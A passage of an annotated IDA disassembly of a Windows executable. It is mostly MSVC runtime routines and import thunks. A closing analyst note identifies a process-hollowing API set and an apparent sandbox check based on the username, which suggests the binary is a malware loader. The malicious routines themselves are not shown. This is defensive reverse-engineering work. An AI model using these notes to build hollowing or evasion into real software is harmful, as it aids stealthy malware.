; ---------------------------------------------------------------------------
mov eax, dword_43E53C
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; __initterm(start in eax, end on the stack)   [MSVC CRT]
; Calls every non-NULL function pointer in [start, end). Note the
; register convention in this build: start arrives in eax and only end
; is on the stack ([esp+4] at entry, [esp+8] after push esi).
; Clobb: eax, plus whatever the callees clobber
;-----------------------------------------------------------------------
__initterm:
push esi
mov esi, eax ; esi = cursor
jmp short loc_403139
; ---------------------------------------------------------------------------
loc_40312E: ; CODE XREF: .text:0040313Dj
mov eax, [esi]
test eax, eax
jz short loc_403136 ; skip NULL slots
call eax
loc_403136: ; CODE XREF: .text:00403132j
add esi, 4
loc_403139: ; CODE XREF: .text:0040312Cj
cmp esi, [esp+8] ; end
jb short loc_40312E
pop esi
retn
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; __initterm_e -- like __initterm, but stops at the first callee that
; returns non-zero and hands that value back.
; In:  eax     = first entry of the table (copied to esi)
;      [esp+8] = one-past-last entry (only stack argument; caller cleans up)
; Out: eax = 0 if every callee returned 0 (or the table was empty),
;            otherwise the first non-zero callee return value
; Clobbers: ecx (holds the pointer being called), flags; esi saved/restored
; Invariant at loc_403148: eax = return value of the previous callee
; (0 before the first call; unchanged when a null slot is skipped).
;-----------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax                         ; esi = cursor into the table
xor eax, eax                         ; "no error yet"
jmp short loc_403157
; ---------------------------------------------------------------------------
loc_403148: ; CODE XREF: .text:0040315Bj
test eax, eax
jnz short loc_40315D                 ; previous callee failed: stop early
mov ecx, [esi]
test ecx, ecx
jz short loc_403154                  ; null slot: skip, eax stays 0
call ecx                             ; eax = callee's result
loc_403154: ; CODE XREF: .text:00403150j
add esi, 4                           ; next dword slot
loc_403157: ; CODE XREF: .text:00403146j
cmp esi, [esp+8]
jb short loc_403148                  ; unsigned: while cursor < end
loc_40315D: ; CODE XREF: .text:0040314Aj
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; __GET_RTERRMSG -- map a runtime-error number to its message pointer.
; In:  [esp+4] = error number (copied to ecx). Caller cleans the stack.
; Out: eax = message pointer taken from the table, or 0 if not found
; Clobbers: ecx, flags
; Table layout, as implied by the addressing: 8-byte entries starting at
; dword_408060; entry i = { code dword at +0 (dword_408060),
; message pointer at +4 (off_408064) }. The loop examines 13h (19) entries,
; index 0..12h.
; NOTE(review): when the loop exhausts without a match, eax is 13h, so the
; compare at loc_403456 reads dword_408060+98h -- the slot just past the 19
; entries the loop looked at. Whether that slot still belongs to the table
; (e.g. a sentinel) cannot be determined from this listing; if it does not,
; the compare reads adjacent .rdata, and a coincidental match would return
; whatever follows it as the "message" pointer.
;-----------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]                     ; ecx = error number to look up
xor eax, eax                         ; eax = entry index
loc_403447: ; CODE XREF: .text:00403454j
cmp ecx, dword_408060[eax*8]         ; code field of entry eax
jz short loc_403456
inc eax
cmp eax, 13h                         ; 19 entries
jb short loc_403447
loc_403456: ; CODE XREF: .text:0040344Ej
shl eax, 3                           ; eax = byte offset of the entry
cmp ecx, dword_408060[eax]           ; re-check; also runs on the not-found path (see note)
jnz short loc_403468
mov eax, off_408064[eax]             ; eax = message pointer of the matching entry
retn
; ---------------------------------------------------------------------------
loc_403468: ; CODE XREF: .text:0040345Fj
xor eax, eax                         ; not found
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; _xcptlookup -- linear search of a 12-byte-entry table for a key.
; In:  edx = key (read before being written, so an incoming register
;            argument; presumably an exception code, given that the
;            caller is __XcptFilter -- confirm)
;      dword_408178 = number of entries (loaded into ecx)
;      table starts at dword_4080F8, stride 0Ch;
;      end = 4080F8h + count*0Ch, computed as (ecx + ecx*2) * 4
; Out: eax = pointer to the matching entry, or 0 if none
; Clobbers: ecx, flags; esi saved/restored
; The post-loop re-check at loc_4034C5 distinguishes "broke out on a match"
; (eax < end and [eax] == edx) from "ran off the end" (eax == end).
; pop esi does not modify flags, so jnb still tests the cmp above it.
;-----------------------------------------------------------------------
_xcptlookup:
mov ecx, dword_408178                ; ecx = entry count
mov eax, offset dword_4080F8         ; eax = cursor
push esi
loc_4034B0: ; CODE XREF: .text:004034C3j
cmp [eax], edx                       ; first dword of the entry == key ?
jz short loc_4034C5
lea esi, [ecx+ecx*2]                 ; esi = count*3
add eax, 0Ch                         ; next entry
lea esi, ds:4080F8h[esi*4]           ; esi = table end (base + count*12)
cmp eax, esi
jb short loc_4034B0
loc_4034C5: ; CODE XREF: .text:004034B2j
lea ecx, [ecx+ecx*2]
lea ecx, ds:4080F8h[ecx*4]           ; ecx = table end (same computation)
cmp eax, ecx
pop esi                              ; flags preserved
jnb short loc_4034D8                 ; cursor reached the end: no match
cmp [eax], edx
jz short locret_4034DA               ; match: return the entry pointer in eax
loc_4034D8: ; CODE XREF: .text:004034D2j
xor eax, eax                         ; not found
locret_4034DA: ; CODE XREF: .text:004034D6j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; ___CppXcptFilter -- SEH filter that only handles MSVC C++ exceptions.
; In:  [esp+4] = exception code
;      [esp+8] = second argument, passed through to __XcptFilter unchanged
;                (exception pointers, presumably -- confirm)
; Out: eax = __XcptFilter(code, arg2) when code == 0E06D7363h,
;            else 0 (EXCEPTION_CONTINUE_SEARCH)
; Clobbers: ecx, flags
; 0E06D7363h is the exception code MSVC uses for C++ throw ('msc' | 0E0000000h).
; The two pop ecx discard the two arguments pushed for the __cdecl callee.
;-----------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403664                 ; not a C++ exception: decline
push dword ptr [esp+8]               ; arg2 (esp untouched so far, so +8 is still the caller's arg2)
push eax                             ; arg1 = exception code
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403664: ; CODE XREF: .text:00403655j
xor eax, eax                         ; EXCEPTION_CONTINUE_SEARCH
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; __ioterm -- free every non-null pointer in a fixed table and clear its slot.
; In:  none (table bounds are constants: dword_43E9A0 .. dword_43EAA0,
;      i.e. 100h bytes = 64 dword slots)
; Out: none defined
; Clobbers: eax, ecx, flags; esi saved/restored
; Each slot is zeroed right after _free, so a repeated pass cannot
; double-free. pop ecx removes the single argument pushed for the __cdecl
; _free. The bound check uses jl (signed); harmless for these addresses,
; but note it is not the unsigned compare one would expect for pointers.
;-----------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_43E9A0         ; esi = cursor
loc_403C6C: ; CODE XREF: .text:00403C85j
mov eax, [esi]
test eax, eax
jz short loc_403C7C                  ; empty slot
push eax
call _free
and dword ptr [esi], 0               ; clear the slot
pop ecx
loc_403C7C: ; CODE XREF: .text:00403C70j
add esi, 4                           ; next slot
cmp esi, offset dword_43EAA0
jl short loc_403C6C
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;-----------------------------------------------------------------------
; sub_403C89 -- walk a table of function pointers, calling each non-null
; one inside its own SEH try block; an exception raised by a callee is
; swallowed and the walk continues with the next entry.
; Called from start (see XREF). No visible arguments; the table bounds are
; the constants below.
; Frame: __SEH_prolog with scope table stru_406618 and 0Ch bytes of locals;
;        var_1C = cursor, ms_exc = the CPPEH_RECORD the prolog sets up.
; Out: nothing defined (eax is whatever the last callee / __SEH_epilog leaves).
; NOTE(review): the cursor starts at offset dword_406E0C and the loop exits
; when cursor >= offset dword_406E0C -- start and end are the same symbol,
; so as labelled by IDA the table is empty and the loop body never runs.
; This shape (and sub_403CCD below, whose address __cinit takes) matches the
; CRT's _RTC_Initialize/_RTC_Terminate walkers over an empty __rtc_* table
; -- confirm against the CRT version.
;-----------------------------------------------------------------------
sub_403C89 proc near ; CODE XREF: start:loc_401F72p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch                             ; size of locals for __SEH_prolog
push offset stru_406618              ; scope table (filter loc_403CB6, handler loc_403CBA)
call __SEH_prolog
mov [ebp+var_1C], offset dword_406E0C ; cursor = table start
loc_403C9C: ; CODE XREF: sub_403C89+3Cj
cmp [ebp+var_1C], offset dword_406E0C ; cursor >= table end ? (same symbol, see note)
jnb short loc_403CC7
and [ebp+ms_exc.disabled], 0         ; enter try level 0 (IDA names the trylevel field "disabled")
mov eax, [ebp+var_1C]
mov eax, [eax]                       ; eax = *cursor
test eax, eax
jz short loc_403CBD                  ; null entry: skip
call eax                             ; indirect call, no arguments
jmp short loc_403CBD
; ---------------------------------------------------------------------------
loc_403CB6: ; DATA XREF: .rdata:stru_406618o
; exception filter: always returns 1 (EXCEPTION_EXECUTE_HANDLER)
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403CBA: ; DATA XREF: .rdata:stru_406618o
; exception handler: restore esp saved by the prolog, then rejoin the loop tail
mov esp, [ebp+ms_exc.old_esp]
loc_403CBD: ; CODE XREF: sub_403C89+27j
; sub_403C89+2Bj
or [ebp+ms_exc.disabled], 0FFFFFFFFh ; leave try (trylevel -1)
add [ebp+var_1C], 4                  ; next entry
jmp short loc_403C9C
; ---------------------------------------------------------------------------
loc_403CC7: ; CODE XREF: sub_403C89+1Aj
call __SEH_epilog
retn
sub_403C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_403CCD(void)
;-----------------------------------------------------------------------
; sub_403CCD -- same walker as sub_403C89, over a second table: call each
; non-null function pointer inside its own SEH try block, swallowing any
; exception and continuing with the next entry.
; Its address is taken by __cinit (see XREF), i.e. it is registered rather
; than called directly. No visible arguments.
; Frame: __SEH_prolog with scope table stru_406628 and 0Ch bytes of locals;
;        var_1C = cursor, ms_exc = the CPPEH_RECORD the prolog sets up.
; Out: nothing defined.
; NOTE(review): cursor start and loop bound are both offset dword_406E14,
; so as labelled the table is empty and the body never executes. Together
; with sub_403C89 this matches the CRT's _RTC_Initialize/_RTC_Terminate
; pair over empty __rtc_* tables -- confirm.
;-----------------------------------------------------------------------
sub_403CCD proc near ; DATA XREF: __cinit:loc_40319Ao
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch                             ; size of locals for __SEH_prolog
push offset stru_406628              ; scope table (filter loc_403CFA, handler loc_403CFE)
call __SEH_prolog
mov [ebp+var_1C], offset dword_406E14 ; cursor = table start
loc_403CE0: ; CODE XREF: sub_403CCD+3Cj
cmp [ebp+var_1C], offset dword_406E14 ; cursor >= table end ? (same symbol, see note)
jnb short loc_403D0B
and [ebp+ms_exc.disabled], 0         ; enter try level 0
mov eax, [ebp+var_1C]
mov eax, [eax]                       ; eax = *cursor
test eax, eax
jz short loc_403D01                  ; null entry: skip
call eax                             ; indirect call, no arguments
jmp short loc_403D01
; ---------------------------------------------------------------------------
loc_403CFA: ; DATA XREF: .rdata:stru_406628o
; exception filter: always returns 1 (EXCEPTION_EXECUTE_HANDLER)
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403CFE: ; DATA XREF: .rdata:stru_406628o
; exception handler: restore esp saved by the prolog, then rejoin the loop tail
mov esp, [ebp+ms_exc.old_esp]
loc_403D01: ; CODE XREF: sub_403CCD+27j
; sub_403CCD+2Bj
or [ebp+ms_exc.disabled], 0FFFFFFFFh ; leave try (trylevel -1)
add [ebp+var_1C], 4                  ; next entry
jmp short loc_403CE0
; ---------------------------------------------------------------------------
loc_403D0B: ; CODE XREF: sub_403CCD+1Aj
call __SEH_epilog
retn
sub_403CCD endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; NOTE(review): not code. IDA disassembled these 8 bytes as instructions,
; but their encodings are 56 43 32 30 58 43 30 30 = ASCII "VC20XC00", the
; marker string MSVC's CRT places immediately before __except_handler3
; (which follows, collapsed). No XREF targets these lines. Treat them as a
; data string, not as reachable code.
push esi                             ; 56    'V'
inc ebx                              ; 43    'C'
xor dh, [eax]                        ; 32 30 '2' '0'
pop eax                              ; 58    'X'
inc ebx                              ; 43    'C'
xor [eax], dh                        ; 30 30 '0' '0'
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_404688 proc near ; DATA XREF: .rdata:stru_4066A8o
xor eax, eax
inc eax
retn
sub_404688 endp
; =============== S U B R O U T I N E =======================================
sub_40468C proc near ; DATA XREF: .rdata:stru_4066A8o
mov esp, [ebp-18h]
sub_40468C endp ; sp-analysis failed
; [0000000C BYTES: COLLAPSED CHUNK OF FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000000E BYTES: COLLAPSED FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; Unnamed __cdecl wrapper: _x_ismbbtype(c, 0, 1).
; In:  [esp+4] = c (read as [esp+0Ch] once the two constants are pushed)
; Out: eax = result of _x_ismbbtype
; Clobbers: whatever _x_ismbbtype clobbers
; NOTE(review): IDA left this entry unlabelled; it directly precedes
; __ismbbkprint and __ismbbkpunct, so it is presumably the first of the
; __ismbbk* family -- confirm.
push 1                               ; arg3
push 0                               ; arg2
push dword ptr [esp+0Ch]             ; arg1 = the caller's first argument
call _x_ismbbtype
add esp, 0Ch                         ; drop the three arguments
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; _getSystemCP -- resolve a code-page selector to an actual code page.
; In:  eax = code page, or one of the CRT pseudo values
;            0FFFFFFFEh (-2, _MB_CP_OEM), 0FFFFFFFDh (-3, _MB_CP_ANSI),
;            0FFFFFFFCh (-4, _MB_CP_LOCALE)
; Out: eax = GetOEMCP() / GetACP() / dword_43E730 for the three pseudo
;            values respectively; any other value is returned unchanged
;      dword_43E6C0 = 1 if a pseudo value was resolved, else 0
; Clobbers: flags (plus whatever the tail-called API clobbers)
; The two Win32 calls are tail jumps: the stdcall API returns straight to
; our caller with the code page already in eax.
; What dword_43E730 holds (the locale's code page?) is not visible here -- confirm.
;-----------------------------------------------------------------------
_getSystemCP:
and dword_43E6C0, 0                  ; assume an explicit code page
cmp eax, 0FFFFFFFEh
jnz short loc_4047D6
mov dword_43E6C0, 1
jmp ds:GetOEMCP                      ; tail call
; ---------------------------------------------------------------------------
loc_4047D6: ; CODE XREF: .text:004047C4j
cmp eax, 0FFFFFFFDh
jnz short loc_4047EB
mov dword_43E6C0, 1
jmp ds:GetACP                        ; tail call
; ---------------------------------------------------------------------------
loc_4047EB: ; CODE XREF: .text:004047D9j
cmp eax, 0FFFFFFFCh
jnz short locret_4047FF              ; plain code page: return it as-is
mov eax, dword_43E730
mov dword_43E6C0, 1
locret_4047FF: ; CODE XREF: .text:004047EEj
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; __NLG_Notify1 -- alternate entry into __NLG_Notify (collapsed below).
; Saves ebx and ecx, loads ebx with the address of dword_408290 and joins
; __NLG_Notify at loc_404D10; the shared tail (including the restores of
; ebx/ecx) lies outside this view. Inputs/outputs are those of __NLG_Notify.
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_408290
jmp short loc_404D10                 ; continue inside __NLG_Notify
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
; Unnamed __cdecl setter for dword_43E714, returning the previous value.
; In:  [esp+4] = new value (caller cleans up)
; Out: eax = old value
; Clobbers: ecx
; NOTE(review): same shape as the dword_43E53C accessor earlier in the file.
; It directly follows ___security_error_handler, and ___buffer_overrun below
; calls that handler, so this is plausibly the CRT's security-error-handler
; setter -- confirm.
mov ecx, [esp+4]                     ; ecx = new value
mov eax, dword_43E714                ; eax = old value (returned)
mov dword_43E714, ecx                ; store new value
retn
; ---------------------------------------------------------------------------
; ___buffer_overrun -- report a stack-cookie (/GS) failure:
; ___security_error_handler(1, 0), pushed right-to-left (0 then 1).
; In/Out: none. IDA's separator after the call indicates it treats the
; handler as non-returning; the two pop ecx (argument cleanup) and the retn
; below are then unreachable.
___buffer_overrun:
push 0                               ; arg2
push 1                               ; arg1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
; Unnamed getter: returns the pointer stored at off_4082A4.
; In: none. Out: eax = off_4082A4. Clobbers: nothing else.
mov eax, off_4082A4
retn
; ---------------------------------------------------------------------------
; Unnamed getter: returns the pointer stored at off_4082A0 -- the same table
; pointer that __chvalidator (below) indexes with 16-bit entries.
; In: none. Out: eax = off_4082A0. Clobbers: nothing else.
mov eax, off_4082A0
retn
; ---------------------------------------------------------------------------
;-----------------------------------------------------------------------
; _strncnt -- bounded string length (strnlen-like).
; In:  eax     = string pointer (register argument; read before written)
;      [esp+4] = maximum number of bytes to examine (caller cleans up)
; Out: eax = number of bytes before the first NUL, or the maximum if no NUL
;            occurs within it. At most `max` bytes are read.
; Clobbers: ecx, flags
; Arithmetic at loc_4052CB: result = max - ecx - 1, where ecx is the
; remaining count when the NUL was found, or -1 when the count ran out / was
; zero (the extra dec at loc_4052CA), which makes the result equal to max.
;   e.g. max=3, "ab\0" -> ecx=0  -> 3-0-1 = 2
;        max=3, "abc"  -> ecx=-1 -> 3-(-1)-1 = 3
;        max=0         -> ecx=-1 -> 0-(-1)-1 = 0
;-----------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]                     ; ecx = bytes remaining
test ecx, ecx
jz short loc_4052CA                  ; max == 0: result 0
loc_4052BF: ; CODE XREF: .text:004052C8j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4052CB                  ; NUL found
inc eax
test ecx, ecx
jnz short loc_4052BF
loc_4052CA: ; CODE XREF: .text:004052BDj
dec ecx                              ; ecx = -1: no NUL within max
loc_4052CB: ; CODE XREF: .text:004052C3j
mov eax, [esp+4]
sub eax, ecx
dec eax                              ; eax = max - ecx - 1
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; Unnamed tail-call thunk: this entry point is an alias of _atol; the
; caller's arguments pass through untouched and _atol returns to the
; caller directly.
; NOTE(review): IDA did not name it; placed right after _atol it is
; presumably _atoi (identical on 32-bit, where int and long coincide) -- confirm.
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; __chvalidator -- classify a character through the ctype table.
; In:  [esp+4] = character c, used directly as a table index
;      [esp+8] = class mask
;      off_4082A0 = pointer to a table of 16-bit entries
; Out: eax = table[c] & mask (the entry is zero-extended from 16 bits, so
;            only the low 16 bits of the mask can survive)
; Clobbers: ecx, flags
; NOTE(review): no range check on c is visible; callers must keep the index
; within the table. A negative c (e.g. EOF) indexes below the table base
; unless the stored pointer is deliberately biased -- confirm.
__chvalidator:
mov eax, [esp+4]                     ; c
mov ecx, off_4082A0                  ; table base
movzx eax, word ptr [ecx+eax*2]      ; 16-bit entry for c
and eax, [esp+8]                     ; & mask
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 2
; Import thunks. Each entry below is a one-instruction __stdcall forwarder
; that jumps through the IAT slot named after `ds:`; the API returns straight
; to the thunk's caller and pops the arguments itself.
; Analyst note (defensive): together with the three resolver routines at the
; end of .text (ZwUnmapViewOfSection, SetThreadContext and WriteProcessMemory
; fetched via GetProcAddress, hence absent from this import table), the
; statically imported CreateProcessA, GetThreadContext, ReadProcessMemory,
; VirtualQueryEx, VirtualAllocEx, VirtualProtectEx and ResumeThread form the
; API set that process-replacement ("hollowing") detections key on. The xrefs
; in the import section also show GetUserNameA's result being compared
; (lstrcmpA) against the literals "USER" / "CurrentUser" in sub_4017DA, which
; looks like an execution-environment check -- confirm in that routine.
jmp ds:FreeLibrary
; ---------------------------------------------------------------------------
jmp ds:GetProcAddress
; ---------------------------------------------------------------------------
jmp ds:LoadLibraryA
; ---------------------------------------------------------------------------
jmp ds:VirtualQueryEx
; ---------------------------------------------------------------------------
jmp ds:ReadProcessMemory
; ---------------------------------------------------------------------------
jmp ds:GetThreadContext
; ---------------------------------------------------------------------------
jmp ds:CreateProcessA
; ---------------------------------------------------------------------------
jmp ds:GetModuleHandleA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtectEx
; ---------------------------------------------------------------------------
jmp ds:VirtualAllocEx
; ---------------------------------------------------------------------------
jmp ds:ResumeThread
; ---------------------------------------------------------------------------
jmp ds:ReadFile
; ---------------------------------------------------------------------------
jmp ds:GetFileSize
; ---------------------------------------------------------------------------
jmp ds:CreateFileA
; ---------------------------------------------------------------------------
jmp ds:lstrcmpA
; ---------------------------------------------------------------------------
jmp ds:SetFileAttributesA
; ---------------------------------------------------------------------------
jmp ds:GetModuleFileNameA
; ---------------------------------------------------------------------------
jmp ds:HeapAlloc
; ---------------------------------------------------------------------------
jmp ds:GetStartupInfoA
; ---------------------------------------------------------------------------
jmp ds:GetCommandLineA
; ---------------------------------------------------------------------------
jmp ds:GetVersionExA
; ---------------------------------------------------------------------------
jmp ds:HeapDestroy
; ---------------------------------------------------------------------------
jmp ds:HeapCreate
; ---------------------------------------------------------------------------
jmp ds:VirtualFree
; ---------------------------------------------------------------------------
jmp ds:HeapFree
; ---------------------------------------------------------------------------
jmp ds:VirtualAlloc
; ---------------------------------------------------------------------------
jmp ds:HeapReAlloc
; ---------------------------------------------------------------------------
jmp ds:IsBadWritePtr
; ---------------------------------------------------------------------------
jmp ds:ExitProcess
; ---------------------------------------------------------------------------
jmp ds:TerminateProcess
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcess
; ---------------------------------------------------------------------------
jmp ds:WriteFile
; ---------------------------------------------------------------------------
jmp ds:GetStdHandle
; ---------------------------------------------------------------------------
jmp ds:UnhandledExceptionFilter
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsA
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStrings
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:WideCharToMultiByte
; ---------------------------------------------------------------------------
jmp ds:GetLastError
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:SetHandleCount
; ---------------------------------------------------------------------------
jmp ds:GetFileType
; ---------------------------------------------------------------------------
jmp ds:GetACP
; ---------------------------------------------------------------------------
